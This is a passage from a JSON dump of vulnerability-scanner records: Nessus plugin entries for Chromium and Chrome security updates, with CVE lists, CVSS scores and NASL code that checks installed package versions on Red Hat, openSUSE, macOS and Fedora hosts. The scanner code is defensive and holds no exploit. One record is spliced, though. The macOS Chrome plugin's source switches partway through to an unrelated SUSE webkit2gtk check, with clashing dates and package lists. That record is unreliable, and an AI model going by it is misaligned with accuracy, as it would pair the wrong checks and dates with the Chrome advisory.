or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3004\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. 
This update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2018-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/118386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1253.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118386);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n 
\"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-1253)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. 
This\nupdate contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-70.0.3538.67-179.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:09", "description": "The version of Google Chrome installed on the remote macOS host is prior to 
70.0.3538.67. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2018/10/16. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-16T00:00:00", "type": "nessus", "title": "Google Chrome < 70.0.3538.67 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "href": "https://www.tenable.com/plugins/nessus/118152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118152);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 70.0.3538.67 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected 
by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 70.0.3538.67. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2018/10/16. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c8f5c86\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 70.0.3538.67 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) 
flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T15:05:39", "description": "Security fix for CVE-2018-17478 CVE-2018-17479. Update to 70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. 
Fixes CVE-2018-16435 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : chromium (2018-fd194a1f14)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-17478", "CVE-2018-17479", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-FD194A1F14.NASL", "href": "https://www.tenable.com/plugins/nessus/120933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fd194a1f14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120933);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n 
\"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-17478\",\n \"CVE-2018-17479\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-fd194a1f14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 28 : chromium (2018-fd194a1f14)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2018-17478 CVE-2018-17479. Update to\n70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462\nCVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466\nCVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470\nCVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475\nCVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd194a1f14\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17479\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 